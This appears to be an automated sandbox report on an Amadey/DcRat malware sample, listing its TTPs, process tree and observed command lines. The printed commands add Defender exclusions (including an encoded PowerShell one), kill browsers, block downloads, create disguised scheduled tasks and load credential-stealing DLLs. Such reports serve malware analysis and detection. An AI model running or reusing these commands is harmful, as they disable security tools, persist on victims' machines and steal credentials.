amadey | 87ccc0e763d565083602aa22911460c261eda93620d2fc88acf9c2076c4dfc83

System Information Discovery

Processes:

6A55.exenbveek.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6A55.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6A55.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	nbveek.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	nbveek.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

67D3.exenbveek.exe7013.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	67D3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	nbveek.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	7013.exe

Loads dropped DLL 3 IoCs

Processes:

rundll32.exerundll32.exerundll32.exe

pid process

3032 rundll32.exe
4980 rundll32.exe
4672 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3032	rundll32.exe
4980	rundll32.exe
4672	rundll32.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

6A55.exenbveek.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6A55.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nbveek.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

74 api.ipify.org
75 api.ipify.org

flow	ioc
74	api.ipify.org
75	api.ipify.org

Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs

Processes:

powershell.exe

pid	process
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exe6A55.exenbveek.exenbveek.exe

description	pid	process	target process
PID 3764 set thread context of 2836	3764	powershell.exe	aspnet_compiler.exe
PID 3892 set thread context of 4360	3892	6A55.exe	AppLaunch.exe
PID 440 set thread context of 1268	440	nbveek.exe	nbveek.exe
PID 1268 set thread context of 4628	1268	nbveek.exe	AppLaunch.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4476 4980 WerFault.exe rundll32.exe

pid	pid_target	process	target process
4476	4980	WerFault.exe	rundll32.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

aspnet_compiler.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	aspnet_compiler.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	aspnet_compiler.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	aspnet_compiler.exe

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
676	schtasks.exe
4808	schtasks.exe
4404	schtasks.exe
3964	schtasks.exe
4792	schtasks.exe
4760	schtasks.exe
1536	schtasks.exe
2132	schtasks.exe
4736	schtasks.exe
3972	schtasks.exe
1536	schtasks.exe
1484	schtasks.exe
404	schtasks.exe
4620	schtasks.exe
5052	schtasks.exe
740	schtasks.exe

Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

532 taskkill.exe
2132 taskkill.exe
2136 taskkill.exe
2632 taskkill.exe
1148 taskkill.exe
1560 taskkill.exe

pid	process
532	taskkill.exe
2132	taskkill.exe
2136	taskkill.exe
2632	taskkill.exe
1148	taskkill.exe
1560	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeaspnet_compiler.exe

pid	process
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
2836	aspnet_compiler.exe
2836	aspnet_compiler.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1192
Suspicious behavior: MapViewOfSection 13 IoCs

Processes:

aspnet_compiler.exe

pid process

2836 aspnet_compiler.exe
1192
1192
1192
1192
1192
1192
1192
1192
1192
1192
1192
1192

pid	process
1192

pid	process
2836	aspnet_compiler.exe
1192
1192
1192
1192
1192
1192
1192
1192
1192
1192
1192
1192

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetaskkill.exeProgramStarter.exetaskkill.exeAppLaunch.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeAppLaunch.exe

description	pid	process
Token: SeDebugPrivilege	3764	powershell.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeDebugPrivilege	2032	ProgramStarter.exe
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeDebugPrivilege	1148	taskkill.exe
Token: SeDebugPrivilege	4360	AppLaunch.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	532	taskkill.exe
Token: SeDebugPrivilege	2132	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	2036	powercfg.exe
Token: SeCreatePagefilePrivilege	2036	powercfg.exe
Token: SeShutdownPrivilege	5104	powercfg.exe
Token: SeCreatePagefilePrivilege	5104	powercfg.exe
Token: SeShutdownPrivilege	5072	powercfg.exe
Token: SeCreatePagefilePrivilege	5072	powercfg.exe
Token: SeShutdownPrivilege	1688	powercfg.exe
Token: SeCreatePagefilePrivilege	1688	powercfg.exe
Token: SeShutdownPrivilege	836	powercfg.exe
Token: SeCreatePagefilePrivilege	836	powercfg.exe
Token: SeShutdownPrivilege	836	powercfg.exe
Token: SeCreatePagefilePrivilege	836	powercfg.exe
Token: SeDebugPrivilege	4628	AppLaunch.exe
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192
Token: SeShutdownPrivilege	1192
Token: SeCreatePagefilePrivilege	1192

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup_soft.exepowershell.execmd.exe67D3.exenbveek.exe6A55.execmd.exe6C59.exe

description	pid	process	target process
PID 4656 wrote to memory of 3764	4656	Setup_soft.exe	powershell.exe
PID 4656 wrote to memory of 3764	4656	Setup_soft.exe	powershell.exe
PID 4656 wrote to memory of 3764	4656	Setup_soft.exe	powershell.exe
PID 3764 wrote to memory of 2836	3764	powershell.exe	aspnet_compiler.exe
PID 3764 wrote to memory of 2836	3764	powershell.exe	aspnet_compiler.exe
PID 3764 wrote to memory of 2836	3764	powershell.exe	aspnet_compiler.exe
PID 3764 wrote to memory of 2836	3764	powershell.exe	aspnet_compiler.exe
PID 3764 wrote to memory of 2836	3764	powershell.exe	aspnet_compiler.exe
PID 3764 wrote to memory of 2836	3764	powershell.exe	aspnet_compiler.exe
PID 1192 wrote to memory of 2036	1192		cmd.exe
PID 1192 wrote to memory of 2036	1192		cmd.exe
PID 2036 wrote to memory of 2176	2036	cmd.exe	cacls.exe
PID 2036 wrote to memory of 2176	2036	cmd.exe	cacls.exe
PID 2036 wrote to memory of 3992	2036	cmd.exe	powershell.exe
PID 2036 wrote to memory of 3992	2036	cmd.exe	powershell.exe
PID 1192 wrote to memory of 3816	1192		67D3.exe
PID 1192 wrote to memory of 3816	1192		67D3.exe
PID 1192 wrote to memory of 3816	1192		67D3.exe
PID 3816 wrote to memory of 440	3816	67D3.exe	nbveek.exe
PID 3816 wrote to memory of 440	3816	67D3.exe	nbveek.exe
PID 3816 wrote to memory of 440	3816	67D3.exe	nbveek.exe
PID 1192 wrote to memory of 3892	1192		6A55.exe
PID 1192 wrote to memory of 3892	1192		6A55.exe
PID 1192 wrote to memory of 3892	1192		6A55.exe
PID 440 wrote to memory of 1536	440	nbveek.exe	schtasks.exe
PID 440 wrote to memory of 1536	440	nbveek.exe	schtasks.exe
PID 440 wrote to memory of 1536	440	nbveek.exe	schtasks.exe
PID 440 wrote to memory of 1440	440	nbveek.exe	cmd.exe
PID 440 wrote to memory of 1440	440	nbveek.exe	cmd.exe
PID 440 wrote to memory of 1440	440	nbveek.exe	cmd.exe
PID 1192 wrote to memory of 736	1192		6C59.exe
PID 1192 wrote to memory of 736	1192		6C59.exe
PID 3892 wrote to memory of 4360	3892	6A55.exe	AppLaunch.exe
PID 3892 wrote to memory of 4360	3892	6A55.exe	AppLaunch.exe
PID 3892 wrote to memory of 4360	3892	6A55.exe	AppLaunch.exe
PID 3892 wrote to memory of 4360	3892	6A55.exe	AppLaunch.exe
PID 1440 wrote to memory of 1028	1440	cmd.exe	cmd.exe
PID 1440 wrote to memory of 1028	1440	cmd.exe	cmd.exe
PID 1440 wrote to memory of 1028	1440	cmd.exe	cmd.exe
PID 2036 wrote to memory of 3116	2036	cmd.exe	reg.exe
PID 2036 wrote to memory of 3116	2036	cmd.exe	reg.exe
PID 1440 wrote to memory of 2164	1440	cmd.exe	cacls.exe
PID 1440 wrote to memory of 2164	1440	cmd.exe	cacls.exe
PID 1440 wrote to memory of 2164	1440	cmd.exe	cacls.exe
PID 1440 wrote to memory of 3956	1440	cmd.exe	cacls.exe
PID 1440 wrote to memory of 3956	1440	cmd.exe	cacls.exe
PID 1440 wrote to memory of 3956	1440	cmd.exe	cacls.exe
PID 2036 wrote to memory of 1456	2036	cmd.exe	reg.exe
PID 2036 wrote to memory of 1456	2036	cmd.exe	reg.exe
PID 3892 wrote to memory of 4360	3892	6A55.exe	AppLaunch.exe
PID 1192 wrote to memory of 4076	1192		7013.exe
PID 1192 wrote to memory of 4076	1192		7013.exe
PID 1192 wrote to memory of 4076	1192		7013.exe
PID 1192 wrote to memory of 4652	1192		explorer.exe
PID 1192 wrote to memory of 4652	1192		explorer.exe
PID 1192 wrote to memory of 4652	1192		explorer.exe
PID 1192 wrote to memory of 4652	1192		explorer.exe
PID 1440 wrote to memory of 2280	1440	cmd.exe	cmd.exe
PID 1440 wrote to memory of 2280	1440	cmd.exe	cmd.exe
PID 1440 wrote to memory of 2280	1440	cmd.exe	cmd.exe
PID 736 wrote to memory of 3932	736	6C59.exe	cmd.exe
PID 736 wrote to memory of 3932	736	6C59.exe	cmd.exe
PID 1440 wrote to memory of 2724	1440	cmd.exe	cacls.exe
PID 1440 wrote to memory of 2724	1440	cmd.exe	cacls.exe

C:\Users\Admin\AppData\Local\Temp\Setup_soft.exe
"C:\Users\Admin\AppData\Local\Temp\Setup_soft.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe"
2⤵
- DcRat
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\664B.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
2⤵
PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3992

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Policies\Google\chrome" /v DownloadRestrictions /t REG_DWORD /d 3
2⤵
PID:3116

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Edge" /v DownloadRestrictions /t REG_DWORD /d 3
2⤵
PID:1456

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1148

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Users\Admin\AppData\Local\Temp\67D3.exe
C:\Users\Admin\AppData\Local\Temp\67D3.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3816

C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\8682d6c68d" /P "Admin:N"&&CACLS "..\8682d6c68d" /P "Admin:R" /E&&Exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:1028

C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
4⤵
PID:3956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2280

C:\Windows\SysWOW64\cacls.exe
CACLS "..\8682d6c68d" /P "Admin:R" /E
4⤵
PID:4320

C:\Windows\SysWOW64\cacls.exe
CACLS "..\8682d6c68d" /P "Admin:N"
4⤵
PID:2724

C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
4⤵
PID:2164

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe" /F
3⤵
- DcRat
- Creates scheduled task(s)
PID:1536

C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1268

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4628

C:\Users\Admin\AppData\Local\Temp\1000055001\DefendUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\1000055001\DefendUpdate.exe"
3⤵
- Executes dropped EXE
PID:4476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\1000055001\DefendUpdate.exe
4⤵
PID:4812

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:5076

C:\Users\Admin\AppData\Local\Temp\1000056001\MicrosoftFIX_error.exe
"C:\Users\Admin\AppData\Local\Temp\1000056001\MicrosoftFIX_error.exe"
3⤵
- Executes dropped EXE
PID:5044

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\cred64.dll, Main
3⤵
- Loads dropped DLL
PID:3032

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\cred64.dll, Main
4⤵
- Loads dropped DLL
PID:4980

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4980 -s 680
5⤵
- Program crash
PID:4476

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\clip64.dll, Main
3⤵
- Loads dropped DLL
PID:4672

C:\Users\Admin\AppData\Local\Temp\6A55.exe
C:\Users\Admin\AppData\Local\Temp\6A55.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Users\Admin\AppData\Local\Temp\6C59.exe
C:\Users\Admin\AppData\Local\Temp\6C59.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\6C59.exe
2⤵
PID:3932

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
3⤵
PID:3940

C:\Users\Admin\AppData\Local\Temp\7013.exe
C:\Users\Admin\AppData\Local\Temp\7013.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:4076

C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe
"C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe"
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAG0AcwBCAFoAcABHAHAASABFAEQAdwBFAFkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBUAHoARABIAGkARwBqAFIAVAB3AHcAcwBiAHMAawAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAeQBiAEsATQBuAEsAdwBkAEUAQgByAEQAcQBUAG8ASQBqAGMAIwA+ACAAQAAoACAAPAAjAGsAbABUAHEAVQBiAGcAaQBwAEcARQBCACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBLAFkAZAB4AEEATABMAFcAagB3AG8ATAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAQQBRAFYAZABCAGcATgBkAFUAbQBCAGwAcQBDAGgAWABLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEcAeQB5AEcATABLAGcAQgBqAHIAeABzAFgAZQBXAGwAVAB1ACMAPgA="
3⤵
PID:1716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG0AcwBCAFoAcABHAHAASABFAEQAdwBFAFkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBUAHoARABIAGkARwBqAFIAVAB3AHcAcwBiAHMAawAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAeQBiAEsATQBuAEsAdwBkAEUAQgByAEQAcQBUAG8ASQBqAGMAIwA+ACAAQAAoACAAPAAjAGsAbABUAHEAVQBiAGcAaQBwAEcARQBCACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBLAFkAZAB4AEEATABMAFcAagB3AG8ATAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAQQBRAFYAZABCAGcATgBkAFUAbQBCAGwAcQBDAGgAWABLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEcAeQB5AEcATABLAGcAQgBqAHIAeABzAFgAZQBXAGwAVAB1ACMAPgA="
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:2252

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:2132

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:992

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:4404

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:1800

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:4808

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:5092

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:1484

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:4744

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:404

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:2468

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:4620

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:4872

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:3964

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:2224

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:1536

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk857" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:4940

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk857" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:4736

C:\Windows\SysWOW64\cmd.exe
